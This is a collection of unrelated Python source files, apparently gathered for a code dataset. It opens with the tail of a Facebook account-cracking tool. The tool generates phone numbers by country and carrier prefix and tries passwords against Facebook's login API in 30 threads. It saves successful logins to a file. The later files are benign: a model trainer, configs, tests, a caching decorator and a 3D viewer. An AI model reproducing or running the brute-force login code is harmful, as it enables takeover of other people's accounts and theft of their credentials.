for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="4":
os.system("clear")
print (logo)
print("954, 897, 967, 937, 700, 727, 965, 786, 874, 856, 566, 590, 527, 568, 578")
print("901, 902, 903, 930, 933, 935, 936, 937, 938, 939")
try:
c = raw_input(" choose code : ")
k="+91"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="5":
os.system("clear")
print (logo)
print("127, 179, 117, 853, 318, 219, 834, 186, 479, 113")
try:
c = raw_input(" choose code : ")
k="+55"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="6":
os.system("clear")
print (logo)
print("11,12,19,16,15,13,14,18,17")
try:
c = raw_input(" choose code : ")
k="+81"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="7":
os.system("clear")
print (logo)
print("1, 2, 3, 4, 5, 6, 7, 8, 9")
try:
c = raw_input(" choose code : ")
k="+82"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="8":
os.system("clear")
print (logo)
print("388, 390, 391, 371, 380, 368, 386, 384, 332, 344, 351, 328")
try:
c = raw_input(" choose code : ")
k="+39"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="9":
os.system("clear")
print (logo)
print("60, 76, 73, 64, 69, 77, 65, 61, 75, 68")
try:
c = raw_input(" choose code : ")
k="+34"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="10":
os.system("clear")
print (logo)
print("66, 69, 78, 79, 60, 72, 67, 53, 51")
try:
c = raw_input(" choose code : ")
k="+48"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="11":
os.system("clear")
print (logo)
print("\033[1;97mJazz Bangladesh : 00,01,02,03,04,05,06,07,08,09")
print("\033[1;97mZong Bangladesh : 10,11,12,13,14,15,16,17,18")
print("\033[1;97mWarid Bangladesh : 20,21,22,23,24")
print("\033[1;97mUfone Bangladesh : 30,31,32,33,34,35,36,37")
print("\033[1;97mTelenor Bangladesh : 40,41,42,43,44,45,46,47,48,49")
try:
c = raw_input(" choose code : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="12":
os.system("clear")
print (logo)
print("\033[1;97m81, 83, 85, 84, 89,")
try:
c = raw_input(" choose code : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="13":
os.system("clear")
print (logo)
print("\033[1;97m901, 902, 903, 930, 933, 935, 936, 937, 938, 939")
try:
c = raw_input(" choose code : ")
k="+98"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="14":
os.system("clear")
print (logo)
print("\033[1;97m69, 693, 698, 694, 695")
try:
c = raw_input(" choose code : ")
k="+3069"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="15":
os.system("clear")
print (logo)
print("\033[1;97mJazz Pakistan: 00,01,02,03,04,05,06,07,08,09")
print("\033[1;97mZong Pakistan: 10,11,12,13,14,15,16,17,18")
print("\033[1;97mWarid Pakistan: 20,21,22,23,24")
print("\033[1;97mUfone Pakistan: 30,31,32,33,34,35,36,37")
print("\033[1;97mTelenor Pakistan: 40,41,42,43,44,45,46,47,48,49")
try:
c = raw_input(" choose code : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =='0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb ('[✓] Total Numbers: '+xxx)
time.sleep(0.5)
psb ('\033[1;97m[✓]\033[1;97m Please wait, process is running ...')
time.sleep(0.5)
psb ('[!] To Stop Process Press CTRL Then Press z')
time.sleep(0.5)
print "\033[1;97m--------------------------------------------------"
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = <PASSWORD>
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[LOGIN]\033[1;97m ' + k + c + user + ' | ' + pass1+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'⊱⊹⊰'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[7 DAYS] ' + k + c + user + ' | ' + pass1+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'⊱⊹⊰'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m--------------------------------------------------"
print '[✓] Process Has Been Completed ....'
print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓] CP File Has Been Saved : save/checkpoint.txt')
raw_input('\n[Press Enter To Go Back]')
menu()
if __name__ == '__main__':
menu()
|
StarcoderdataPython
|
1606923
|
#!/usr/bin/env python
"""
Get a list of taxids that have data sizes above some threshold.
:Authors:
<NAME> <<EMAIL>>
"""
import argparse
import datetime
import sys
from ast import literal_eval
def process_file(file_location, threshold=10000000):
"""
Process a balance_data.py file looking for taxids that have too much data.
Parameters
----------
file_location: str
The location of a balance_data.py file.
threshold: int
The maximum data size to look for.
Returns
-------
too_large: list
A list of taxonomic ids
"""
too_large = []
with open(file_location) as fdr:
for line in fdr:
if line.startswith("("):
line = line.strip()
taxid_tuple = literal_eval(line)
if taxid_tuple[1] == 'train' and taxid_tuple[2] > threshold:
too_large.append((taxid_tuple[0], taxid_tuple[2]))
return too_large
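# Illustrative example (not from the original file): given a balance_data.py
# output containing lines such as
#   (562, 'train', 25000000)
#   (9606, 'test', 50000000)
# process_file(path, threshold=10000000) would return [(562, 25000000)],
# since only 'train' entries whose size exceeds the threshold are kept.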
def main():
"""Parse the arguments."""
tic = datetime.datetime.now()
parser = argparse.ArgumentParser(
description=('Examine a balance_data.py output file and '
'look for taxids with data sizes that are too large.'))
parser.add_argument("file",
type=str,
help=("The output of balance_data.py"))
parser.add_argument("--threshold",
"-t",
type=int,
help=("The maximum size of a data set."),
default=10000000)
args = parser.parse_args()
print(args, file=sys.stderr)
output = process_file(args.file, args.threshold)
for taxid in output:
print(taxid[0], file=sys.stdout)
print(taxid, file=sys.stderr)
toc = datetime.datetime.now()
print("The process took time {}.".format(toc - tic), file=sys.stderr)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
3480108
|
_base_ = [
'../../_base_/models/universenet50_2008.py',
'../../_base_/datasets/coco_detection_mstrain_480_960.py',
'../../_base_/schedules/schedule_1x.py', '../../_base_/default_runtime.py'
]
model = dict(
pretrained=('https://shanghuagao.oss-cn-beijing.aliyuncs.com/res2net/'
'res2net50_26w_4s-06e79181.pth'),
backbone=dict(
type='Res2Net',
depth=50,
scales=4,
base_width=26,
num_stages=4,
out_indices=(0, 1, 2, 3),
deep_stem=False,
avg_down=False,
frozen_stages=1,
norm_cfg=dict(type='SyncBN', requires_grad=True),
norm_eval=False,
style='pytorch',
dcn=dict(type='DCN', deform_groups=1, fallback_on_stride=False),
stage_with_dcn=(False, False, False, True)))
data = dict(samples_per_gpu=4)
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(
_delete_=True, grad_clip=dict(max_norm=35, norm_type=2))
lr_config = dict(warmup_iters=1000)
fp16 = dict(loss_scale=512.)
|
StarcoderdataPython
|
11224469
|
<reponame>iotayo/aivivn-tone
import os
import gc
import random
import torch
import dill
import torch.nn as nn
import numpy as np
from torch.optim import Adam
from torchtext.data import BucketIterator
from dataset import Seq2SeqDataset, PAD, tgt_field_name
from model import Encoder, Decoder, Seq2SeqConcat
from cyclic_lr import CyclicLR
from visualization import Visualization
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
class Trainer:
def __init__(self, src_vocab, tgt_vocab,
max_len=300, hidden_size=300, n_layers=2, clip=5, n_epochs=30):
# hyper-parameters
self.max_len = max_len
self.hidden_size = hidden_size
self.n_layers = n_layers
self.clip = clip
self.n_epochs = n_epochs
# vocab
self.src_vocab = src_vocab
self.tgt_vocab = tgt_vocab
self.pad_idx = self.src_vocab.stoi[PAD]
# prepare model
self.encoder = Encoder(self.src_vocab, self.max_len, self.hidden_size, self.n_layers)
self.decoder = Decoder(self.tgt_vocab, self.max_len, self.hidden_size * 2, self.n_layers)
self.reverse_decoder = Decoder(self.tgt_vocab, self.max_len, self.hidden_size * 2, self.n_layers, reverse=True)
self.model = Seq2SeqConcat(self.encoder, self.decoder, self.reverse_decoder, self.pad_idx)
self.model.to(device)
print(self.model)
print("Total parameters:", sum([p.nelement() for p in self.model.parameters()]))
# initialize weights
for name, param in self.model.named_parameters():
if "lstm.bias" in name:
# set lstm forget gate to 1 (Jozefowicz et al., 2015)
n = param.size(0)
param.data[n//4:n//2].fill_(1.0)
elif "lstm.weight" in name:
nn.init.xavier_uniform_(param)
# prepare loss function; don't calculate loss on PAD tokens
self.criterion = nn.NLLLoss(ignore_index=self.pad_idx)
# prepare optimizer and scheduler
self.optimizer = Adam(self.model.parameters())
self.scheduler = CyclicLR(self.optimizer, base_lr=0.00001, max_lr=0.00005,
step_size_up=4000, step_size_down=4000,
mode="triangular", gamma=1.0, cycle_momentum=False)
# book keeping vars
self.global_iter = 0
self.global_numel = []
self.global_loss = []
self.global_acc = []
# visualization
self.vis_loss = Visualization(env_name="aivivn_tone", xlabel="step", ylabel="loss", title="loss (mean per 300 steps)")
self.vis_acc = Visualization(env_name="aivivn_tone", xlabel="step", ylabel="acc", title="training accuracy (mean per 300 steps)")
def train(self, train_iterator, val_iterator, start_epoch=0, print_every=100):
for epoch in range(start_epoch, self.n_epochs):
self._train_epoch(epoch, train_iterator, train=True, print_every=print_every)
self.save(epoch)
# evaluate on validation set after each epoch
with torch.no_grad():
self._train_epoch(epoch, val_iterator, train=False, print_every=print_every)
def train_in_parts(self, train_parts, val, val_iterator, batch_size, start_epoch=0, print_every=100):
for epoch in range(start_epoch, self.n_epochs):
# shuffle data each epoch
random.shuffle(train_parts)
for train_src_, train_tgt_ in train_parts:
# create train dataset
print("Training part [{}] with target [{}]...".format(train_src_, train_tgt_))
train_ = Seq2SeqDataset.from_file(train_src_, train_tgt_, share_fields_from=val)
# create iterator
train_iterator_ = BucketIterator(dataset=train_, batch_size=batch_size,
sort=False, sort_within_batch=True,
sort_key=lambda x: len(x.src),
shuffle=True, device=device)
# train
self._train_epoch(epoch, train_iterator_, train=True, print_every=print_every)
# clean
del train_
del train_iterator_
gc.collect()
# save
self.save(epoch)
# evaluate on validation set after each epoch
with torch.no_grad():
self._train_epoch(epoch, val_iterator, train=False, print_every=print_every)
def resume(self, train_iterator, val_iterator, save_path):
checkpoint = torch.load(save_path)
self.model.load_state_dict(checkpoint["model_state_dict"])
self.model.to(device)
self.optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
self.scheduler.load_state_dict(checkpoint["scheduler_state_dict"])
start_epoch = checkpoint["epoch"] + 1
self.train(train_iterator, val_iterator, start_epoch)
def resume_in_parts(self, train_parts, val, val_iterator, batch_size, save_path):
checkpoint = torch.load(save_path)
self.model.load_state_dict(checkpoint["model_state_dict"])
self.model.to(device)
self.optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
self.scheduler.load_state_dict(checkpoint["scheduler_state_dict"])
start_epoch = checkpoint["epoch"] + 1
self.train_in_parts(train_parts, val, val_iterator, batch_size, start_epoch=start_epoch)
def _train_epoch(self, epoch, batch_iterator, train=True, print_every=100):
if train:
self.model.train()
else:
self.model.eval()
print("***Evaluating on validation set***")
total_loss = 0
total_correct = 0
total_numel = 0
total_iter = 0
num_batch = len(batch_iterator)
for i, batch in enumerate(batch_iterator):
# forward propagation
# (batch, seq_len, tgt_vocab_size)
if train:
# crude annealing teacher forcing
teacher_forcing = 0.5
if epoch == 0:
teacher_forcing = max(0.5, (num_batch - total_iter) / num_batch)
output, reverse_output, combined_output = self.model(batch, mask_softmax=0.5, teacher_forcing=teacher_forcing)
else:
output, reverse_output, combined_output = self.model(batch, mask_softmax=1.0, teacher_forcing=1.0)
# (batch, seq_len)
target = getattr(batch, tgt_field_name)
# reshape to calculate loss
output = output.view(-1, output.size(-1))
reverse_output = reverse_output.view(-1, reverse_output.size(-1))
combined_output = combined_output.view(-1, combined_output.size(-1))
target = target.view(-1)
# calculate loss
loss = self.criterion(output, target) + self.criterion(reverse_output, target) + self.criterion(combined_output, target)
# backprop
if train:
self.optimizer.zero_grad()
loss.backward()
nn.utils.clip_grad_norm_(self.model.parameters(), self.clip)
self.optimizer.step()
self.scheduler.step()
# calculate accuracy
correct = output.argmax(dim=-1).eq(target).sum().item()
r_correct = reverse_output.argmax(dim=-1).eq(target).sum().item()
c_correct = combined_output.argmax(dim=-1).eq(target).sum().item()
# summarize for each batch
total_loss += loss.item()
total_correct += c_correct
total_numel += target.numel()
total_iter += 1
# add to global summary
if train:
self.global_iter += 1
self.global_numel.append(target.numel())
self.global_loss.append(loss.item())
self.global_acc.append(c_correct)
# visualize
if self.global_iter == 1:
self.vis_loss.plot_line(self.global_loss[0], 1)
self.vis_acc.plot_line(self.global_acc[0]/total_numel, 1)
# update graph every 10 iterations
if self.global_iter % 10 == 0:
# moving average of most recent 300 losses
moving_avg_loss = sum(self.global_loss[max(0, len(self.global_loss)-300):]) / min(300.0, self.global_iter)
moving_avg_acc = sum(self.global_acc[max(0, len(self.global_acc) - 300):]) / sum(self.global_numel[max(0, len(self.global_numel) - 300):])
# visualize
self.vis_loss.plot_line(moving_avg_loss, self.global_iter)
self.vis_acc.plot_line(moving_avg_acc, self.global_iter)
# print
if i % print_every == 0:
template = "epoch = {} iter = {} loss = {:5.3f} correct = {:6.3f} r_correct = {:6.3f} c_correct = {:6.3f}"
print(template.format(epoch,
i,
loss.item(),
correct / target.numel() * 100.0,
r_correct / target.numel() * 100.0,
c_correct / target.numel() * 100.0))
# summarize for each epoch
template = "EPOCH = {} AVG_LOSS = {:5.3f} AVG_CORRECT = {:6.3f}\n"
print(template.format(epoch,
total_loss / total_iter,
total_correct / total_numel * 100.0))
def save(self, epoch, save_path="checkpoint"):
torch.save({
"epoch": epoch,
"model_state_dict": self.model.state_dict(),
"optimizer_state_dict": self.optimizer.state_dict(),
"scheduler_state_dict": self.scheduler.state_dict(),
"global_iter": self.global_iter
}, os.path.join(save_path, "aivivn_tone.model.ep{}".format(epoch)))
def set_seeds(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
def load_data(train_src, train_tgt, val_src, val_tgt, batch_size=64, save_path="checkpoint"):
# prepare dataset
print("Reading data...")
train = Seq2SeqDataset.from_file(train_src, train_tgt)
print("Building vocab...")
train.build_vocab(max_size=300)
val = Seq2SeqDataset.from_file(val_src, val_tgt, share_fields_from=train)
src_vocab = train.src_field.vocab
tgt_vocab = train.tgt_field.vocab
# save vocab
with open(os.path.join(save_path, "vocab.src"), "wb") as f:
dill.dump(src_vocab, f)
with open(os.path.join(save_path, "vocab.tgt"), "wb") as f:
dill.dump(tgt_vocab, f)
print("Source vocab size:", len(src_vocab))
print("Target vocab size:", len(tgt_vocab))
# data iterator
# keep sort=False and shuffle=False to speed up training and reduce memory usage
train_iterator = BucketIterator(dataset=train, batch_size=batch_size,
sort=False, sort_within_batch=True,
sort_key=lambda x: len(x.src),
shuffle=False, device=device)
val_iterator = BucketIterator(dataset=val, batch_size=batch_size, train=False,
sort=False, sort_within_batch=True,
sort_key=lambda x: len(x.src),
shuffle=False, device=device)
return src_vocab, tgt_vocab, train_iterator, val_iterator
def load_data_in_parts(train_src, train_tgt, val_src, val_tgt, batch_size=64, save_path="checkpoint"):
# prepare dataset
print("Reading data...")
val = Seq2SeqDataset.from_file(val_src, val_tgt)
print("Building vocab...")
val.build_vocab(max_size=300)
src_vocab = val.src_field.vocab
tgt_vocab = val.tgt_field.vocab
# save vocab
with open(os.path.join(save_path, "vocab.src"), "wb") as f:
dill.dump(src_vocab, f)
with open(os.path.join(save_path, "vocab.tgt"), "wb") as f:
dill.dump(tgt_vocab, f)
print("Source vocab size:", len(src_vocab))
print("Target vocab size:", len(tgt_vocab))
# data iterator
# keep sort=False and shuffle=False to speed up training and reduce memory usage
val_iterator = BucketIterator(dataset=val, batch_size=batch_size, train=False,
sort=False, sort_within_batch=True,
sort_key=lambda x: len(x.src),
shuffle=False, device=device)
return src_vocab, tgt_vocab, list(zip(train_src, train_tgt)), val, val_iterator, batch_size
if __name__ == "__main__":
train_src = ["data/train.src.0", "data/train.src.1", "data/train.src.2", "data/train.src.3"]
train_tgt = ["data/train.tgt.0", "data/train.tgt.1", "data/train.tgt.2", "data/train.tgt.3"]
val_src = "data/val.src"
val_tgt = "data/val.tgt"
# src_vocab_path = "checkpoint/vocab.src"
# tgt_vocab_path = "checkpoint/vocab.tgt"
# set random seeds
set_seeds(420)
# load vocab
# with open(src_vocab_path, "rb") as f:
# src_vocab = dill.load(f)
# with open(tgt_vocab_path, "rb") as f:
# tgt_vocab = dill.load(f)
# load data
src_vocab, tgt_vocab, train_parts, val, val_iterator, batch_size = load_data_in_parts(train_src, train_tgt, val_src, val_tgt)
# prepare trainer
trainer = Trainer(src_vocab, tgt_vocab)
# train
trainer.train_in_parts(train_parts, val, val_iterator, batch_size)
# trainer.resume_in_parts(train_parts, val, val_iterator, batch_size, save_path="checkpoint/aivivn_tone.model.ep19")
|
StarcoderdataPython
|
1765353
|
from django.core.management.base import BaseCommand
from hc.api.models import Flip
from hc.lib.date import month_boundaries
class Command(BaseCommand):
help = "Prune old Flip objects."
def handle(self, *args, **options):
threshold = min(month_boundaries(months=3))
q = Flip.objects.filter(created__lt=threshold)
n_pruned, _ = q.delete()
return "Done! Pruned %d flips." % n_pruned
|
StarcoderdataPython
|
12834608
|
<reponame>LunarWatcher/NN-chatbot-legacy
from time import time
def ifOrTuple():
    # Compare a conditional expression against tuple indexing over 10M iterations.
    boolVal = False
    t = time()
    for i in range(10000000):
        "test" if boolVal else "testFalse"
    print("Conditional expression, total seconds: {}".format(time() - t))
    t = time()
    for i in range(10000000):
        ("testFalse", "test")[boolVal]
    print("Tuple indexing, total seconds: {}".format(time() - t))
def updateOrManual():
    # Compare direct item assignment against dict.update over 10M iterations.
    t = time()
    x = {}
    for i in range(10000000):
        x[i] = i
    print("Item assignment, total seconds: {}".format(time() - t))
    t = time()
    for i in range(10000000):
        x.update({i: i})
    print("dict.update, total seconds: {}".format(time() - t))
if __name__ == "__main__":
ifOrTuple()
print("####")
updateOrManual()
print("####")
|
StarcoderdataPython
|
1814998
|
<filename>tests/dhcpv4/process/test_v4_stateless.py
"""DHCPv4 Stateless clients"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_control
import srv_msg
import misc
@pytest.mark.v4
@pytest.mark.stateless
def test_v4_stateless_with_subnet_empty_pool():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '$(EMPTY)')
srv_control.config_srv_opt('subnet-mask', '255.255.255.0')
srv_control.config_srv_opt('time-offset', '50')
srv_control.config_srv_opt('routers', '192.168.3.11,172.16.58.3')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('1')
srv_msg.client_requests_option('2')
srv_msg.client_requests_option('3')
srv_msg.client_sets_value('Client', 'ciaddr', '$(CIADDR)')
srv_msg.client_send_msg('INFORM')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ACK')
srv_msg.response_check_content('Response', None, 'yiaddr', '0.0.0.0')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_option_content('Response', '1', None, 'value', '255.255.255.0')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_option_content('Response', '2', None, 'value', '50')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'value', '192.168.3.11')
srv_msg.response_check_option_content('Response', '3', None, 'value', '172.16.58.3')
|
StarcoderdataPython
|
5030009
|
<reponame>fivehealth/function-cache
__all__ = ['function_cache']
from functools import wraps
from inspect import signature
import logging
from .backends import get_cache_backend
logger = logging.getLogger(__name__)
def function_cache(name='default', keys=None, key_prefix=None, **kwargs):
cache_backend = get_cache_backend(name, keys=keys, **kwargs)
_key_prefix = key_prefix
def decorator(decorated_func):
sig = signature(decorated_func)
pass_cache_key = '_cache_key' in sig.parameters or any(param.kind == param.VAR_KEYWORD for param in sig.parameters.values())
cache_key_prefix = f'{decorated_func.__module__}.{decorated_func.__name__}-' if _key_prefix is None else _key_prefix
@wraps(decorated_func)
def wrapper(*wrapped_args, **wrapped_kwargs):
cache_key = f'{cache_key_prefix}{cache_backend.compute_key(wrapped_args, wrapped_kwargs)}'
cache_hit = cache_backend.exists(cache_key)
logger.debug(f'Cache {"hit" if cache_hit else "miss"} for cache key <{cache_key}>.')
if cache_hit:
return cache_backend.get(cache_key)
if pass_cache_key:
result = decorated_func(*wrapped_args, **wrapped_kwargs, _cache_key=cache_key)
else:
result = decorated_func(*wrapped_args, **wrapped_kwargs)
#end if
cache_backend.put(cache_key, result)
return result
#end def
return wrapper
#end def
return decorator
#end def
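# --- Hedged usage sketch (not part of the original module) ---
# Assuming a backend registered under the name 'default' is resolvable by
# get_cache_backend, the decorator memoizes results under a key built from the
# wrapped function's module and name plus its call arguments:
#
#   @function_cache(name='default')
#   def expensive(x, y):
#       return x + y
#
#   expensive(1, 2)  # computed, then stored via cache_backend.put
#   expensive(1, 2)  # cache hit, returned via cache_backend.get
#
# Functions that declare a `_cache_key` parameter (or accept **kwargs) also
# receive the computed key, as detected by the `pass_cache_key` check above.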
|
StarcoderdataPython
|
8125190
|
<gh_stars>1-10
from sequence_transfer.sequence import TokenSequence
tokens = ['My', '<PASSWORD>', 'is', '<PASSWORD>']
# 01 - We create a char sequence and access basic property
s = TokenSequence.new(tokens)
print(f"Text: {s.text}") # access text property
print(f"Size: {s.size}") # access size property
print(f"Length: {len(s)}") # alias of the size property
# 02 - Playing with subsequences
sub = s[1]  # get the second token (exactly: return a subsequence of size 1 that contains that second token)
print(f"Sequence `{sub.text}` starts at {sub.start} and stops at: {sub.stop}")
sub = s[1:3]  # the second and third tokens
print(f"Sequence `{sub.text}` starts at {sub.start} and stops at: {sub.stop}")
sub = s[:-1]  # every token except the last one
print(f"Sequence `{sub.text}` starts at {sub.start} and stops at: {sub.stop}")
# 03 - Iterating over a TokenSequence object creates subsequences of size 1, one for each token:
for sub in s:
print(f"Token `{sub.text}` starts at {sub.start} and stops at: {sub.stop}")
# 04 - Show a subsequence of tokens in its original context
sub = s[1, 2]
print(sub.in_context())
# 05 - Conclusion:
# A TokenSequence behaves more or less like a Python list of strings.
# But any subsequence of a TokenSequence "remembers" the entire sequence of tokens.
|
StarcoderdataPython
|
8094290
|
<reponame>snake-biscuits/bsp_tool_examples
import OpenGL.GL as gl
from PyQt5 import QtCore, QtGui, QtWidgets
from . import camera
from . import render
from . import vector
camera.keybinds = {camera.FORWARD: [QtCore.Qt.Key_W],
camera.BACK: [QtCore.Qt.Key_S],
camera.LEFT: [QtCore.Qt.Key_A],
camera.RIGHT: [QtCore.Qt.Key_D],
camera.UP: [QtCore.Qt.Key_Q],
camera.DOWN: [QtCore.Qt.Key_E]}
class Viewport(QtWidgets.QOpenGLWidget):
def __init__(self):
super(Viewport, self).__init__(parent=None)
self.render_manager = render.Manager()
self.camera = camera.Camera((0, 0, 0)) # start camera at origin
self.clock = QtCore.QTimer()
self.clock.timeout.connect(self.update)
self.keys = set()
self.last_mouse_position = vector.vec2()
self.mouse_position = vector.vec2()
def initializeGL(self):
self.render_manager.init_GL()
self.render_manager.init_buffers()
self.clock.start(15) # tick length in milliseconds
self.last_mouse_position = vector.vec2(QtGui.QCursor.pos().x(), QtGui.QCursor.pos().y())
def keyPressEvent(self, event):
self.keys.add(event.key())
def keyReleaseEvent(self, event):
self.keys.discard(event.key())
def update(self):
tick_length = self.clock.interval() - self.clock.remainingTime()
self.makeCurrent()
gl.glRotate(30 * tick_length, 1, 0, 1.25) # orbit camera
self.mouse_position = vector.vec2(QtGui.QCursor.pos().x(), QtGui.QCursor.pos().y())
mouse_motion = self.mouse_position - self.last_mouse_position
self.last_mouse_position = self.mouse_position
self.camera.update(mouse_motion, self.keys, tick_length)
self.render_manager.update()
self.doneCurrent()
super(Viewport, self).update() # calls paintGL
def paintGL(self):
gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)
gl.glLoadIdentity()
self.camera.set()
# set camera rotation
# draw 2d skybox
# move camera
self.render_manager.draw()
# origin marker
gl.glUseProgram(0)
gl.glBegin(gl.GL_LINES)
gl.glColor(1, 0, 0) # X+
gl.glVertex(0, 0, 0)
gl.glVertex(1, 0, 0)
gl.glColor(0, 1, 0) # Y+
gl.glVertex(0, 0, 0)
gl.glVertex(0, 1, 0)
gl.glColor(0, 0, 1) # Z+
gl.glVertex(0, 0, 0)
gl.glVertex(0, 0, 1)
gl.glEnd()
def view_bsp(bsp): # so far rBSP only
app = QtWidgets.QApplication([])
viewport = Viewport()
viewport.setGeometry(128, 64, 576, 576)
# just grab the first mesh of a rBSP
special_vertices = bsp.vertices_of_mesh(0)
vertices = list()
for vertex in special_vertices:
position = bsp.VERTICES[vertex.position_index]
normal = bsp.VERTEX_NORMALS[vertex.normal_index]
vertices.append((position, normal, vertex.uv)) # universal format
indices = [i for i, v in enumerate(vertices)]
viewport.show()
mesh_0 = render.Renderable("Mesh 0", "mesh_flat", vertices, indices)
viewport.render_manager.add_renderable(mesh_0)
app.exec_()
|
StarcoderdataPython
|
1622064
|
import unittest
from config import *
from main import app
class TestConfigVariableSetting(unittest.TestCase):
def test_testing_app_variables(self):
""" tests if app takes correct variables after being set up as test"""
self.app = app
self.app.config.from_object('config.TestingConfig')
self.assertTrue(self.app.config['TESTING'],
"TESTING app variable"
"should be set to True")
self.assertFalse(self.app.config['DEBUG'], "DEBUG app variable"
"should be set to False")
def test_production_app_variables(self):
""" tests if app takes correct variables after being set up as production"""
self.app = app
self.app.config.from_object('config.ProductionConfig')
self.assertFalse(self.app.config['TESTING'],
"TESTING app variable"
"should be set to False")
self.assertFalse(self.app.config['DEBUG'], "DEBUG app variable"
"should be set to False")
def test_development_app_variables(self):
""" tests if app takes correct variables after being set up as development"""
self.app = app
self.app.config.from_object('config.DevelopmentConfig')
self.assertFalse(self.app.config['TESTING'],
"TESTING app variable"
"should be set to False")
self.assertTrue(self.app.config['DEBUG'], "DEBUG app variable"
"should be set to True")
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
4816210
|
from .obje import *
from .devi import *
from .objs.ctrl import CtrlTag
from supyr_struct.defs.tag_def import TagDef
# replace the object_type enum one that uses
# the correct default value for this object
obje_attrs = dict(obje_attrs)
obje_attrs[0] = dict(obje_attrs[0], DEFAULT=8)
ctrl_attrs = Struct("ctrl_attrs",
SEnum16('type',
'toggle_switch',
'on_button',
'off_button',
'call_button'
),
SEnum16('triggers_when',
'touched_by_player',
'destroyed'
),
float_zero_to_one('call_value'),
Pad(80),
dependency("on", valid_event_effects),
dependency("off", valid_event_effects),
dependency("deny", valid_event_effects),
)
ctrl_body = Struct("tagdata",
obje_attrs,
devi_attrs,
ctrl_attrs,
SIZE=792,
)
def get():
return ctrl_def
ctrl_def = TagDef("ctrl",
blam_header('ctrl'),
ctrl_body,
ext=".device_control", endian=">", tag_cls=CtrlTag
)
|
StarcoderdataPython
|
5390
|
<reponame>yanwunhao/auto-mshts
from util.io import read_setting_json, read_0h_data, read_24h_data, draw_single_curve
from util.convert import split_array_into_samples, calculate_avg_of_sample, convert_to_percentage
from util.calculus import calculate_summary_of_sample, fit_sigmoid_curve
import matplotlib.pyplot as plt
import numpy as np
import csv
setting = read_setting_json()
setting = setting["rule"]
# load experiment parameters
# experiment parameters are stored in ./data/setting.json
initial_filename = setting["0h_datafile"]
final_filename = setting["24h_datafile"]
# sample width and height are the size of each sample area
sample_width = setting["sample_width"]
sample_height = setting["sample_height"]
dilution_protocol = setting["dilution_protocol"]
# width of each dilution
basic_width = setting["basic_width"]
# number of each control group
control_number_list = setting["control_number"]
# output directory
output_directory = setting["output_directory"]
# import initial concentration and calculate x_data
initial_concentration = setting["initial_concentration"]
repeat_times = int(sample_width / basic_width)
x_data = []
current_concentration = initial_concentration
for i in range(repeat_times):
